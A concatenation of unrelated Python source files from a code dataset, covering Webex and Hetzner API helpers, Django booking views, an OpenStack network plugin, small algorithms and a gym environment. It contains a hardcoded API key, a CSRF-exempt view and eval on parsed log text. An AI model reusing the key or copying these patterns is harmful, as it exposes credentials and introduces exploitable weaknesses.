api_key}\r\n\r\n\r\n# Standard issue Bearer - Auth\r\n\r\ndef get_room_ids(url, headers):\r\n response = json.loads(requests.get(url + \"rooms\", headers=headers).text)['items']\r\n # Gets the JSON object which is a dict with every room,\r\n # then unpacks it to a dict and assigns the ['items'] key's values to response\r\n roomids = []\r\n # List of room ids to be returned\r\n for i in 
response:\r\n        roomids.append(i['id'])\r\n        # Find all room ids and return to a list for use later\r\n    return roomids # Return type is list\r\n\r\n\r\ndef get_msft_price():\r\n    ts = TimeSeries(key=\"6N6NCHHOY72NXZ4T\", output_format='pandas')\r\n    # Initialize session with Alpha Vantage\r\n    data, meta_data = ts.get_daily('MSFT')\r\n    # Get all daily data for MSFT up to last close\r\n    return data.tail(1)['4. close'].iloc[0]\r\n    # Traverse the dataframe and get the value for the latest close, by getting the first tail row,\r\n    # the close of the price and the price itself\r\n    # Return type is float\r\n\r\n\r\ndef get_screener_roomid():\r\n    roomids = get_room_ids(url, headers)\r\n    # Get room ids, this is a function call to the first function in the lib\r\n    needed_id = \"\"\r\n    # Declare a variable that will store the id needed to send message to Screener space\r\n    for id in roomids:\r\n\r\n        response = json.loads(requests.get(url + \"rooms/\" + id, headers=headers).text)\r\n        # Get the details of each room in roomids list\r\n        if response['title'] == 'Screener':\r\n            # if the name of the space is Screener\r\n            needed_id = response['id']\r\n            # Get the id of the space\r\n    return needed_id\r\n    # return the id\r\n","sub_path":"webexlib.py","file_name":"webexlib.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"109869282","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 20 20:44:50 2018\r\n\r\n@author: 王磊\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D  # noqa: F401 -- registers the '3d' projection used below\r\n\r\ndata = np.random.randint(0, 255, size=[40,40,40])\r\n\r\nx, y, z = data[0], data[1], data[2]\r\nax = plt.subplot(111, projection='3d')\r\nax.scatter(x[:10], y[:10], z[:10], c='y')\r\nax.scatter(x[10:20], y[10:20], z[10:20], c='r')\r\nax.scatter(x[30:40], y[30:40], z[30:40], c='g')\r\n\r\nax.set_zlabel('Z')\r\nax.set_ylabel('Y')\r\nax.set_xlabel('X')\r\n\r\nplt.show()\r\n\r\n\r\n","sub_path":"数据挖掘/三维图学习1.py","file_name":"三维图学习1.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"481177501","text":"import pytest\nfrom stack import Stack\n\n\n@pytest.fixture\ndef stack():\n    return Stack()\n\n\ndef test_creating_empty_stack(stack):\n    assert stack.count == 0\n\n\ndef test_adding_new_element_to_stack(stack):\n    stack.push(3)\n    assert stack.count == 1\n\n\ndef test_resize_method(stack):\n    stack._Stack__resize(10)\n    assert stack.length == 10\n\n\ndef test_removing_an_element(stack):\n    stack.push(3)\n    stack.push(2)\n    stack.pop()\n    assert stack.count == 1\n\n\ndef test_removing_an_item_from_empty_stack(stack):\n    assert stack.pop() == None\n\n\ndef test_resizing_after_pop(stack):\n    stack.push(10)\n    stack.push(9)\n    stack.push(8)\n    stack.push(7)\n    stack.push(6)\n    stack.push(5)\n    stack.push(4)\n    stack.push(3)\n\n    stack.pop()\n    stack.pop()\n    stack.pop()\n    stack.pop()\n    stack.pop()\n    stack.pop()\n    assert stack.length == 4\n\n\ndef test_iteration(stack):\n    stack.push(9)\n    stack.push(10)\n    stack.push(11)\n    elements = []\n    for e in stack:\n        elements.append(e)\n\n    assert elements == [11, 10, 9]\n","sub_path":"google_interview/resizing_array/test_stack.py","file_name":"test_stack.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"550983527","text":"import statistics as stats\n\nmylist = [1, 2, 3, 4]\n\nx = stats.mean(mylist)\ny = 
stats.median(mylist)\n# z = stats.mode(mylist)\na = stats.stdev(mylist)\nb = stats.variance(mylist)\nprint(x, y, a, b)\n","sub_path":"maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"280431852","text":"from queues_adt import Queue\r\n\r\n\r\ndef bfs(start, end):\r\n    \"\"\"\r\n    Breadth first search. Takes a start node and end node, and uses\r\n    its neighbour list to traverse the graph.\r\n    Uses the FIFO queue in queues_adt.py.\r\n    :param start: Node\r\n    :param end: Node\r\n    :return: success, True or False. If the algorithm found the end node or not\r\n    previous, dictionary with all nodes, and where we came from\r\n    (parent) to this node.\r\n    has_been_next, list of nodes that have been considered as the next node.\r\n    \"\"\"\r\n    q = Queue()\r\n    q.add(start)\r\n    previous = {start: None}\r\n    success = False\r\n    has_been_next = []\r\n\r\n    while not q.empty():\r\n        currnode = q.pop()\r\n        currnode.visit()\r\n        if currnode == end:\r\n            success = True\r\n            break\r\n\r\n        for nextnode in currnode.neighbours.keys():\r\n            if nextnode not in has_been_next:\r\n                has_been_next.append(nextnode)\r\n            if nextnode not in previous:\r\n                q.add(nextnode)\r\n                previous[nextnode] = currnode\r\n\r\n    return success, previous, has_been_next\r\n","sub_path":"API/bfs_pf.py","file_name":"bfs_pf.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"172810241","text":"\nfrom hcloud import Client\n\nfrom hcloud.images.domain import Image\nfrom hcloud.server_types.domain import ServerType\nfrom hcloud.ssh_keys.client import SSHKeysClient\n\nfrom ctrldbops import add_hetzner, get_hetzner\n\nimport configparser\n\nhetzner_config = configparser.ConfigParser()\nhetzner_config.read('/home/bitclouds/bitclouds/controller/config.ini')\n\nhetzner_token = hetzner_config['hetzner']['api_key']\n\nclient = Client(token=hetzner_token)  # API token is read from config.ini above\nsshClient = SSHKeysClient(client)\n\n\ndef getServers():\n    hetzner_servers = client.servers.get_all()\n\n    servers = list()\n\n    for server in hetzner_servers:\n        serverData = dict()\n\n        serverData['id'] = server.id\n        serverData['ip'] = server.public_net.ipv4.ip\n        serverData['name'] = server.name\n\n        servers.append(serverData)\n\n    return servers\n\n\ndef createServer(name, image):\n    #freebsd = snapid=\"8322744\"\n    #image=Image(type=\"snapshot\", id=snapid)\n    sysImage = True\n\n    if image==\"debian\":\n        image_name = \"debian-10\"\n    elif image == \"centos\":\n        image_name = \"centos-8\"\n    elif image == \"freebsd\":\n        snap_id = \"8322744\"\n        sysImage = False\n    elif image == \"vpn\":\n        snap_id = \"9207785\"\n        sysImage = False\n    elif image == \"ubuntu\":\n        image_name = \"ubuntu-18.04\"\n\n    if sysImage:\n        response = client.servers.create(name=name, server_type=ServerType(\"cx11\"), image=Image(name=image_name))\n    else:\n        response = client.servers.create(name=name, server_type=ServerType(\"cx11\"), image=Image(type=\"snapshot\", id=snap_id))\n\n    server = response.server\n\n    serverData = dict()\n\n    serverData['id'] = server.id\n    serverData['ip'] = server.public_net.ipv4.ip\n    serverData['pwd'] = response.root_password\n\n    add_hetzner(name, server.id, server.public_net.ipv4.ip, \"cx11\", response.root_password)\n\n    return serverData\n\n\ndef deleteServer(id):\n\n    servers = client.servers.get_all()\n    found = False\n    for server in servers:\n        if server.id == 
id:\r\n            found = True\r\n            print(str(id) + \" to be deleted from hetzner\")\r\n            server.delete()\r\n    if not found:\r\n        print(str(id) + \" not found or already deleted\")\r\n\r\n    return True\r\n","sub_path":"controller/hetzner.py","file_name":"hetzner.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"46680296","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Appointment,Customer,Service\nimport json\nimport datetime\nfrom django.utils.text import phone2numeric\nfrom .EmailService import *\n'''\nAPI support\n1. Fetch \n2. Fetch free slots for a day\n3. Fetch bookings for a day\n4. Fetch bookings for an existing user\n\n'''\nfrom django.http.response import JsonResponse, HttpResponse\n\n# Method 1 : GetAllMfg\n\ndef getAllBookings(request):\n    bs=[]\n    bookings = Appointment.objects.all()\n    for booking in bookings:\n        bs.append(booking.to_dict())\n    return HttpResponse(json.dumps(bs),content_type='application/json')\n\ndef getAllBookingsByDate(request):\n    bs=[]\n    date_range_start=request.GET.get('start_date')\n    dt_start=datetime.datetime.strptime(date_range_start,'%Y-%m-%d')\n    date_range_end=request.GET.get('end_date')\n    dt_end=datetime.datetime.strptime(date_range_end,'%Y-%m-%d')+datetime.timedelta(days=1)\n    bookings=Appointment.objects.all()\n    bookings=bookings.filter(serviceDate__gt=dt_start)\n    bookings=bookings.filter(serviceDate__lt=dt_end)\n    for booking in bookings:\n        bs.append(booking.to_dict())\n    return HttpResponse(json.dumps(bs),content_type='application/json')\n\n@csrf_exempt\ndef bookAppointment(request):\n    in_data=None\n    customer=None\n    if(request.method=='POST'):\n        in_data=json.loads(request.body)\n        if('customer' in in_data.keys()):\n            customer=getOrCreateCustomer(in_data['customer'])\n        a=Appointment.objects.create()\n        a.customer=customer\n        s=Service.objects.get(type=in_data['service_type'])\n        a.service=s\n        a.serviceInstructions=in_data['serviceInstruction']\n        a.serviceDateTime=datetime.datetime.strptime(in_data['dateTime'],'%Y-%m-%d %H-%M-%S')\n        a.save()\n        mail={'Subject':'Booking complete'}\n        sendConfirmationMail(mail)\n        return HttpResponse(json.dumps(a.to_dict()),content_type='application/json')\n    \n\ndef getOrCreateCustomer(customer):\n    email=None\n    phone=None\n    if('email' in customer.keys()):\n        email=customer['email']\n    if('phoneNumber' in customer.keys()):\n        phone=customer['phoneNumber']\n    if(email==None and phone==None):\n        return None\n    customers=Customer.objects.all()\n    if(email != None and email !=\"\"):\n        customers=customers.filter(email__iexact=email)\n    if(phone != None and phone!=\"\"):\n        customers=customers.filter(phoneNumber__iexact=phone)\n    if(len(customers)==0):\n        c=Customer.objects.create()\n        if('name' in customer.keys()):\n            c.name=customer['name']\n        if(phone!=None):\n            c.phoneNumber=phone\n        if(email!=None):\n            c.email=email\n        c.save()\n        return c\n    else:\n        return customers.first()\n\n\n# Create your views here.\n","sub_path":"booking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"122032395","text":"\"\"\"\nCreated September 11, 2012\n\n@author: Justin Hammond, Rackspace Hosting\n\"\"\"\nimport logging\n\nimport aicq\nimport nvplib\nfrom quantum.common import exceptions as exception\n\n\nLOG = logging.getLogger(\"aicq-quantumplugin\")\nLOG.setLevel(logging.INFO)\n\n\nclass 
NvpPlugin(object):\n \"\"\"\n NvpPlugin is a Quantum plugin that provides L2 Virtual Network\n functionality using NVP.\n \"\"\"\n\n def __init__(self, configfile=None, loglevel=None, cli=False):\n self.blue = aicq.blue.Blue(configfile)\n pass\n\n def get_all_networks(self, tenant_id, **kwargs):\n networks = nvplib.get_all_networks(self.blue, tenant_id, [])\n LOG.debug(\"get_all_networks() completed for tenant %s: %s\" %\n (tenant_id, networks))\n return networks\n\n def create_network(self, tenant_id, net_name, **kwargs):\n \"\"\"\n Creates a new Virtual Network, and assigns it a symbolic name.\n :returns: a sequence of mappings with the following signature:\n {'net-id': uuid that uniquely identifies the\n particular quantum network,\n 'net-name': a human-readable name associated\n with network referenced by net-id\n }\n :raises:\n \"\"\"\n kwargs[\"controller\"] = self.blue\n return nvplib.create_network(tenant_id, net_name, **kwargs)\n\n def create_custom_network(self, tenant_id, net_name, transport_zone,\n controller):\n \"\"\"Not required by quantum_plugin_base.py\"\"\"\n return self.create_network(tenant_id, net_name,\n network_type=\"custom\",\n transport_zone=transport_zone,\n controller=controller)\n\n def delete_network(self, tenant_id, netw_id):\n \"\"\"\n Deletes the network with the specified network identifier\n belonging to the specified tenant.\n\n :returns: a sequence of mappings with the following signature:\n {'net-id': uuid that uniquely identifies the\n particular quantum network\n }\n :raises: exception.NetworkInUse\n :raises: exception.NetworkNotFound\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n nvplib.delete_network(self.blue, netw_id)\n\n LOG.debug(\"delete_network() completed for tenant: %s\" % tenant_id)\n return {'id': netw_id}\n\n def get_network_details(self, tenant_id, netw_id):\n \"\"\"\n Retrieves a list of all the remote vifs that\n are attached to the network.\n\n :returns: a sequence of mappings with the following signature:\n {'id': uuid that uniquely identifies the\n particular quantum network\n 'name': a human-readable name associated\n with network referenced by net-id\n 'ifaces': ['vif1_on_network_uuid',\n 'vif2_on_network_uuid',...,'vifn_uuid']\n }\n :raises: exception.NetworkNotFound\n :raises: exception.QuantumException\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n result = None\n remote_vifs = []\n switch = netw_id\n lports = nvplib.query_ports(self.blue, switch,\n relations=\"LogicalPortAttachment\")\n\n for port in lports:\n relation = port[\"_relations\"]\n vic = relation[\"LogicalPortAttachment\"]\n if \"vif_uuid\" in vic:\n remote_vifs.append(vic[\"vif_uuid\"])\n\n if not result:\n result = nvplib.get_networks(self.blue, switch)\n\n d = {\n \"id\": netw_id,\n \"ifaces\": remote_vifs,\n \"name\": result[\"display_name\"],\n \"net-op-status\": \"UP\",\n }\n LOG.debug(\"get_network_details() completed for tenant %s: %s\" %\n (tenant_id, d))\n return d\n\n def update_network(self, tenant_id, netw_id, **kwargs):\n \"\"\"\n Updates the properties of a particular Virtual Network.\n\n :returns: a sequence of mappings representing the new network\n attributes, with the following signature:\n {'id': uuid that uniquely identifies the\n particular quantum network\n 'name': the new human-readable name\n associated with network referenced by net-id\n }\n :raises: exception.NetworkNotFound\n \"\"\"\n if 
not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n result = nvplib.update_network(self.blue, netw_id, **kwargs)\n LOG.debug(\"update_network() completed for tenant %s\" % tenant_id)\n return {\n \"id\": netw_id,\n \"name\": result[\"display_name\"],\n \"net-op-status\": \"UP\",\n }\n\n def get_all_ports(self, tenant_id, netw_id, **kwargs):\n \"\"\"\n Retrieves all port identifiers belonging to the\n specified Virtual Network.\n\n :returns: a list of mapping sequences with the following signature:\n [{'id': uuid representing a particular port\n on the specified quantum network\n },\n ....\n {'id': uuid representing a particular port\n on the specified quantum network\n }\n ]\n :raises: exception.NetworkNotFound\n \"\"\"\n ids = []\n filters = kwargs.get(\"filter_ops\") or {}\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n LOG.debug(\"Getting logical ports on lswitch: %s\" % netw_id)\n lports = nvplib.query_ports(self.blue, netw_id, fields=\"uuid\",\n filters=filters)\n\n for port in lports:\n ids.append({\"id\": port[\"uuid\"]})\n\n # Delete from the filter so Quantum doesn't attempt to filter on this\n # too\n if filters and \"attachment\" in filters:\n del filters[\"attachment\"]\n\n LOG.debug(\"get_all_ports() completed for tenant: %s\" % tenant_id)\n LOG.debug(\"returning port listing:\")\n LOG.debug(ids)\n return ids\n\n def create_port(self, tenant_id, netw_id, port_init_state=None, **params):\n \"\"\"\n Creates a port on the specified Virtual Network.\n\n :returns: a mapping sequence with the following signature:\n {'id': uuid representing the created port\n on specified quantum network\n }\n :raises: exception.NetworkNotFound\n :raises: exception.StateInvalid\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n params[\"controller\"] = self.blue\n result = nvplib.create_port(tenant_id, netw_id, port_init_state,\n **params)\n d = {\n \"id\": result[\"uuid\"],\n \"port-op-status\": result[\"port-op-status\"],\n }\n LOG.debug(\"create_port() completed for tenant %s: %s\" % (tenant_id, d))\n return d\n\n def update_port(self, tenant_id, netw_id, portw_id, **params):\n \"\"\"\n Updates the properties of a specific port on the\n specified Virtual Network.\n\n :returns: a mapping sequence with the following signature:\n {'id': uuid representing the\n updated port on specified quantum network\n 'state': update port state (UP or DOWN)\n }\n :raises: exception.StateInvalid\n :raises: exception.PortNotFound\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n LOG.debug(\"Update port request %s\" % (params))\n params[\"controller\"] = self.blue\n result = nvplib.update_port(netw_id, portw_id, **params)\n LOG.debug(\"update_port() completed for tenant %s\" % tenant_id)\n port = {\n \"id\": portw_id,\n \"port_state\": result[\"admin_status_enabled\"],\n \"port-op-status\": result[\"port-op-status\"],\n }\n return port\n\n def delete_port(self, tenant_id, netw_id, portw_id):\n \"\"\"\n Deletes a port on a specified Virtual Network,\n if the port contains a remote interface attachment,\n the remote interface is first un-plugged and then the port\n is deleted.\n\n :returns: a mapping sequence with the following signature:\n {'port-id': uuid representing the deleted port\n on specified quantum network\n }\n :raises: exception.PortInUse\n 
:raises: exception.PortNotFound\n        :raises: exception.NetworkNotFound\n        \"\"\"\n        if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n            raise exception.NetworkNotFound(net_id=netw_id)\n        nvplib.delete_port(self.blue, netw_id, portw_id)\n        LOG.debug(\"delete_port() completed for tenant %s\" % tenant_id)\n        return {\"id\": portw_id}\n\n    def get_port_details(self, tenant_id, netw_id, portw_id):\n        \"\"\"\n        This method allows the user to retrieve a remote interface\n        that is attached to this particular port.\n\n        :returns: a mapping sequence with the following signature:\n                    {'id': uuid representing the port on\n                            specified quantum network\n                     'network-id': uuid representing the particular\n                                    quantum network\n                     'attachment': uuid of the virtual interface\n                                   bound to the port, None otherwise\n                    }\n        :raises: exception.PortNotFound\n        :raises: exception.NetworkNotFound\n        \"\"\"\n        if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n            raise exception.NetworkNotFound(net_id=netw_id)\n        port = nvplib.get_port(self.blue, netw_id, portw_id,\n                               \"LogicalPortAttachment\")\n        state = \"ACTIVE\" if port[\"admin_status_enabled\"] else \"DOWN\"\n        op_status = nvplib.get_port_status(self.blue, netw_id, portw_id)\n\n        relation = port[\"_relations\"]\n        attach_type = relation[\"LogicalPortAttachment\"][\"type\"]\n\n        vif_uuid = \"None\"\n        if attach_type == \"VifAttachment\":\n            vif_uuid = relation[\"LogicalPortAttachment\"][\"vif_uuid\"]\n\n        d = {\n            \"id\": portw_id, \"attachment\": vif_uuid,\n            \"network-id\": netw_id, \"port_state\": state,\n            \"port-op-status\": op_status,\n        }\n        return d\n\n    def plug_interface(self, tenant_id, netw_id, portw_id,\n                       remote_interface_id):\n        \"\"\"\n        Attaches a remote interface to the specified port on the\n        specified Virtual Network.\n\n        :returns: None\n        :raises: exception.NetworkNotFound\n        :raises: exception.PortNotFound\n        :raises: exception.AlreadyAttached\n                 (? 
should the network automatically unplug/replug)\n        \"\"\"\n        if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n            raise exception.NetworkNotFound(net_id=netw_id)\n        result = nvplib.plug_interface(self.blue, netw_id, portw_id,\n                                       \"VifAttachment\",\n                                       attachment=remote_interface_id)\n        LOG.debug(\"plug_interface() completed for tenant %s: %s\" %\n                  (tenant_id, result))\n\n    def unplug_interface(self, tenant_id, netw_id, portw_id):\n        \"\"\"\n        Detaches a remote interface from the specified port on the\n        specified Virtual Network.\n\n        :returns: None\n        :raises: exception.NetworkNotFound\n        :raises: exception.PortNotFound\n        \"\"\"\n        if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n            raise exception.NetworkNotFound(net_id=netw_id)\n        result = nvplib.unplug_interface(self.blue, netw_id, portw_id)\n\n        LOG.debug(\"unplug_interface() completed for tenant %s: %s\" %\n                  (tenant_id, result))\n\n    def get_port_stats(self, tenant_id, network_id, port_id):\n        \"\"\"\n        Not required by quantum_plugin_base.py\n        Returns port statistics for a given port.\n\n        {\n            \"rx_packets\": 0,\n            \"rx_bytes\": 0,\n            \"tx_errors\": 0,\n            \"rx_errors\": 0,\n            \"tx_bytes\": 0,\n            \"tx_packets\": 0\n        }\n\n        :returns: dict() of stats\n        :raises: exception.NetworkNotFound\n        :raises: exception.PortNotFound\n        \"\"\"\n        if not nvplib.check_tenant(self.blue, network_id, tenant_id):\n            raise exception.NetworkNotFound(net_id=network_id)\n        return nvplib.get_port_stats(self.blue, network_id, port_id)\n","sub_path":"aicq/QuantumPlugin.py","file_name":"QuantumPlugin.py","file_ext":"py","file_size_in_byte":13368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"82418203","text":"from random import randrange\nimport base64, json\n\nclass MovieCommit:\n    def load_file(self, filename):\n        \"\"\" Just a simple function to grab the correct file and read it into\n        a list. Might want to abstract this a bit more so we can swap a\n        db in place. Python's version of the repository pattern? \"\"\"\n        f = [line.rstrip() for line in open('data/'+ filename + '.txt')]\n        return f\n\n    def get_quote(self, movies, permalink = None):\n        \"\"\" Facade for everything. If we don't have a permalink\n        then just grab a movie and line and call the get_quote_by_id\n        method. Otherwise, decode the permalink and return the data.\n        Randrange method called to start at 1 instead of 0 to account for\n        the first line being the movie title. \"\"\"\n        if permalink is None:\n            movie = self.get_movie(movies)\n            line = randrange(1, len(movie) - 1, 1)\n        else:\n            data = self.decode_permalink(permalink)\n            movie = data[0]\n            line = data[1]\n\n        return self.get_quote_by_id(movie, line)\n\n    def get_quote_by_id(self, movie, line):\n        \"\"\" We have what we need. Load the correct file, make the permalink\n        and then structure the dictionary for return. Simple stuff. \"\"\"\n        lines = self.load_file(movie)\n        permalink = self.encode_permalink(movie, line)\n        return {\n            'title': lines[0],\n            'quote': lines[line],\n            'file': movie,\n            'line': line,\n            'permalink': permalink\n        }\n\n    def get_movie(self, movies):\n        \"\"\" Just get me a random element from the list. \"\"\"\n        count = len(movies)\n        n = randrange(0, count - 1, 1)\n        return movies[n]\n\n    def encode_permalink(self, movie, line):\n        \"\"\" Permalink is a list with the filename and line number. Convert the list to json\n        and then base64 encode the damn thing. Something about proper padding ... 
\"\"\"\n return base64.b64encode(json.dumps([movie, line]))\n\n def decode_permalink(self, permalink):\n \"\"\" Do the opposite of the encode_permalink method. Decode the string, and then load\n it as json to make it a dictionary. Something about proper padding ... \"\"\"\n return json.loads(base64.b64decode(permalink))","sub_path":"moviecommit.py","file_name":"moviecommit.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"140749060","text":"from itertools import permutations\r\n\r\nclass solution:\r\n def permutation_(self, n: int) -> int:\r\n num = list(permutations([1,2,3,4,5,6,7,8,9], 3))\r\n\r\n for _ in range(n):\r\n test, s, b = map(int, input().split())\r\n test = list(str(test))\r\n remove_cnt = 0\r\n\r\n for i in range(len(num)):\r\n i -= remove_cnt\r\n strk_cnt = 0\r\n ball_cnt = 0\r\n\r\n for j in range(3):\r\n if int(test[j]) in num[i]:\r\n if j == num[i].index(int(test[j])):\r\n strk_cnt += 1\r\n\r\n else:\r\n ball_cnt += 1\r\n\r\n if strk_cnt != s or ball_cnt != b:\r\n num.remove(num[i])\r\n remove_cnt += 1\r\n \r\n return len(num)\r\n\r\nsol = solution()\r\n\r\nn = int(input())\r\n\r\nprint(sol.permutation_(n))\r\n\r\n","sub_path":"geonhokim/1.Brute_force_Search/숫자야구.py","file_name":"숫자야구.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"230500452","text":"from pathlib import Path\nimport re\nfrom ast import literal_eval\nfrom stk import (\n BuildingBlock,\n ConstructedMolecule,\n cage,\n)\n\n\ndef load_population(pop_path):\n '''Loads the population of molecules from the EA.'''\n with open(pop_path, 'r') as f:\n pop = []\n subpop = []\n if 'fitness' in pop_path:\n recording = True\n else:\n recording = False\n\n gen = 1\n\n for line in f:\n # Initial population treated differently.\n if gen == 1:\n if 'Population log:' in line:\n recording = True\n elif 'ConstructedMolecule' in line and recording:\n subpop.append(line)\n elif 'Starting generation' in line and recording:\n recording = False\n pop.append(subpop)\n subpop = []\n gen += 1\n elif gen != 1:\n if 'Selecting members' in line:\n recording = True\n elif 'ConstructedMolecule' in line and recording:\n subpop.append(line)\n elif 'Starting' in line or 'Successful' in line and recording:\n recording = False\n pop.append(subpop)\n subpop = []\n gen += 1\n return pop\n\n\ndef parse_population(pop):\n # Import modules from stk.\n stk_pop = []\n for sp in pop:\n subpop = []\n for mem in sp:\n p_bb = re.compile('(Const[^\\t]+)')\n stk_mem = eval(p_bb.search(mem)[0])\n stk_mem.fitness_vector = literal_eval(\n re.search('\\t(\\[([^\\,]+\\,)+[^\\]]+\\])', mem).group(1))\n stk_mem.fitness_value = literal_eval(\n re.search('(\\d+\\.\\d+|1e-08)(?=$)', mem).group(0))\n subpop.append(stk_mem)\n stk_pop.append(subpop)\n return stk_pop\n\n\ndef get_stk_pop(pop_path):\n pop_path = Path(pop_path)\n pop = load_population(str(pop_path))\n pop = {pop_path: parse_population(pop)}\n return pop\n\n\n","sub_path":"stages/stage3_ea_analysis/create_image/analyse_population.py","file_name":"analyse_population.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"611088895","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 4 18:45:06 2020\n\n@author: alan\n\"\"\"\n\n\nimport numpy as np\nimport gym\nimport cv2\nfrom gym import 
spaces\nfrom path_following.envs.envUtils import utils\nfrom gym.envs.classic_control import rendering\nfrom scipy.spatial import cKDTree\nfrom colorama import Fore, Style\n\n\nclass Laser2DLine(gym.Env):\n \"\"\"\n Custom environment that follows gym interface. This env renders a 2D\n texture and plots a laser. The agent must learn how to follow a trajectory\n with the laser keep a orientation normal to the trajectory.\n \"\"\"\n metadata = {'render.modes': ['human', 'rgb_array']}\n\n def __init__(self):\n super(Laser2DLine, self).__init__()\n \"Initialize environment variables\"\n params = {\"window_shape\": (60, 60, 3),\n \"world_size\": (600, 600),\n \"laser_length\": 40,\n \"laser_diam\": 5,\n \"domain_randomization\": True,\n \"n_points\": 600,\n \"timesteps\": 1000\n }\n\n self.window_shape = params[\"window_shape\"]\n self.world_size = params[\"world_size\"]\n self.laser_length = params[\"laser_length\"]\n self.laser_diam = params[\"laser_diam\"]\n self.dr = params[\"domain_randomization\"]\n self.n_points = params[\"n_points\"]\n self.timestep_limit = params[\"timesteps\"]\n self.action_space = spaces.MultiDiscrete([3, 3, 3])\n self.observation_space = spaces.Box(low=0, high=255,\n shape=self.window_shape,\n dtype=np.uint8)\n self.viewer = None\n\n def reset(self):\n self.world, self.trajectory = utils.render_world(self.n_points,\n self.world_size,\n self.dr)\n if self.dr:\n self.laser_length = np.random.randint(10, self.window_shape[0])\n self.laser_diam = np.random.randint(5, 10)\n\n self.KDT = cKDTree(self.trajectory[:, 0:2])\n self.state = self.trajectory[0, :]\n self.goal = self.trajectory[-1, :]\n self.timestep = 0\n self.c_reward = 0\n self.points_in = 0\n self.laser_traj = []\n self.laser_traj.append(self.state.astype(np.int32))\n self.worldL, self.observation = utils.render_laser_line(self.state,\n np.copy(self.world),\n self.laser_length,\n self.laser_diam,\n self.window_shape)\n return self.observation\n\n def step(self, action):\n self.timestep += 1\n info = {}\n info[\"status\"] = \"ok\"\n done = False\n reward = 0\n self.state += action - np.ones(action.shape, dtype=np.int32)\n self.state[0:2] = np.clip(self.state[0:2], [0, 0], [self.world_size])\n if self.state[2] == 360:\n self.state[2] = 0\n if self.state[2] == -1:\n self.state[2] = 359\n self.laser_traj.append(self.state.astype(np.int32))\n self.worldL = utils.render_laser_traj(np.copy(self.world),\n self.laser_traj,\n self.laser_diam)\n self.worldL, self.observation = utils.render_laser_line(self.state,\n self.worldL,\n self.laser_length,\n self.laser_diam,\n self.window_shape)\n\n reward, self.points_in, pos_error, ori_error = utils.calculate_reward_line(self.trajectory, self.KDT,\n self.laser_traj, self.points_in)\n dist2Goal = np.linalg.norm(self.goal[0:2]-self.state[0:2])\n\n if dist2Goal < 20:\n done = True\n info[\"status\"] = \"goal reached\"\n reward += 100\n elif self.timestep > self.timestep_limit:\n info[\"status\"] = \"timesteps limit reached\"\n done = True\n self.c_reward += reward\n info[\"state\"] = self.state\n info[\"world\"] = self.worldL\n info[\"timesteps\"] = self.timestep\n info[\"cReward\"] = self.c_reward\n info[\"pos_error\"] = pos_error\n info[\"ori_error\"] = ori_error\n\n if done and info[\"status\"] == \"goal reached\":\n print(Fore.GREEN + \"reward: {0:.2f}, timesteps: {1}, status: {2}\\\n \".format(info[\"cReward\"], info[\"timesteps\"], info[\"status\"]) + Style.RESET_ALL)\n return self.observation, reward, done, info\n\n def render(self, mode=\"human\"):\n if self.viewer is 
